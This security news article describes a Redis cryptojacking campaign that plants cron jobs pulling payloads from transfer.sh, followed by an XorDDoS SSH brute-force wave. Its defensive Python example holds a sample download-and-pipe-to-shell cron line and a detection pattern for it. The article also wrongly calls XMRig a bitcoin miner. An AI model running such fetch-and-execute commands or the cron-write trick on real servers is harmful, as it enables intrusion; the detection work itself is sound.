A new cryptojacking campaign is targeting misconfigured Redis database servers, and it relies on a legitimate, open-source command-line file transfer service to deliver its payload. According to the cloud security company Cado Security, the command-line friendliness of transfer[.]sh has made it a convenient tool for hosting and distributing malicious payloads.
“Underpinning this campaign was the use of transfer[.]sh,” Cado Security said in a report. “It’s possible that it’s an attempt at evading detections based on other common code hosting domains (such as pastebin[.]com).”
The attack chain begins with an unsecured Redis deployment, which the attacker abuses to register a cron job; when the scheduler parses that job, the result is arbitrary code execution. The job is crafted to retrieve a payload hosted on transfer[.]sh. It is worth noting that other threat actors, including TeamTNT and WatchDog, have used similar techniques in their cryptojacking campaigns.
The payload is a script that launches an XMRig bitcoin miner, but only after clearing memory, killing rival miners, and installing the pnscan network scanner to find other vulnerable Redis servers and spread the infection. Although the campaign’s goal is plainly to hijack system resources for cryptocurrency mining, the company warned that infection by this malware could have unintended consequences: careless reconfiguration of Linux memory management mechanisms can quickly lead to data corruption or a loss of system availability.
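The two defensive checks that follow from the chain described above, written here as an added example (not Cado Security’s code or the campaign’s script): an audit of a redis.conf for the settings that let an unauthenticated client write a cron job, and a scan of cron entries for download-and-run lines pointing at transfer.sh. The config text and cron lines are constructed samples, and the transfer.sh path in them is a placeholder.

```python
"""Added example: flag Redis settings and cron entries tied to the cron-job abuse above."""
import re

# Constructed sample of a weakly configured redis.conf (not a real host's file).
SAMPLE_REDIS_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
# requirepass left unset
"""

# Constructed sample crontab; the transfer.sh path is a placeholder, not a real payload.
SAMPLE_CRONTAB = """\
*/5 * * * * root /usr/bin/updatedb
* * * * * root curl -fsSL https://transfer.sh/EXAMPLE/x.sh | sh
0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf
"""

def audit_redis_conf(text):
    """Return a list of weak-setting findings for the body of a redis.conf."""
    settings = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        settings.setdefault(key.lower(), []).append(value.strip())
    findings = []
    if "requirepass" not in settings:
        findings.append("no requirepass: unauthenticated clients are accepted")
    # With no bind directive Redis listens on all interfaces (protected-mode then limits it).
    bind_tokens = " ".join(settings.get("bind", ["0.0.0.0"])).split()
    if any(tok in ("0.0.0.0", "*", "::") for tok in bind_tokens):
        findings.append("bind exposes Redis on all interfaces")
    if settings.get("protected-mode", ["yes"])[0].lower() == "no":
        findings.append("protected-mode is disabled")
    renamed = {v.split()[0].lower() for v in settings.get("rename-command", []) if v}
    if "config" not in renamed:
        findings.append("CONFIG not renamed: dir/dbfilename can be pointed at a cron directory")
    return findings

# A curl/wget invocation whose URL (before any pipe or separator) is on transfer.sh.
TRANSFER_SH_FETCH = re.compile(r"\b(curl|wget)\b[^|;&]*transfer\.sh", re.I)

def suspicious_cron_entries(text):
    """Return the cron lines that download a payload from transfer.sh."""
    return [line for line in text.splitlines() if TRANSFER_SH_FETCH.search(line)]
```

Run the two functions over the real /etc/redis/redis.conf and /etc/cron.d files to get findings for a live host; a hardened config (requirepass set, bind on loopback, CONFIG renamed) produces an empty list.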
The campaign is the latest threat to Redis servers, following Redigo and HeadCrab in recent months. The findings coincide with Avertium’s disclosure of a new wave of attacks that brute-force SSH servers in order to install the XorDDoS botnet malware and then use the compromised hosts to launch distributed denial-of-service (DDoS) attacks against targets in China and the United States.
The cybersecurity firm reported observing 1.2 million unauthorized SSH connection attempts across 18 honeypots between October 6 and December 7, 2022, and attributed the activity to a threat actor based in China. Some 42% of those attempts came from 49 IP addresses registered to the ChinaNet Jiangsu Province Network; the remainder came from 8,000 IP addresses dispersed around the globe.
“It was found that once the scanning identified an open port, it would be subject to a brute-force attack against the ‘root’ account using a list of approximately 17,000 passwords,” said Avertium. “Once the brute-force attack was successful, an XorDDoS bot was installed.”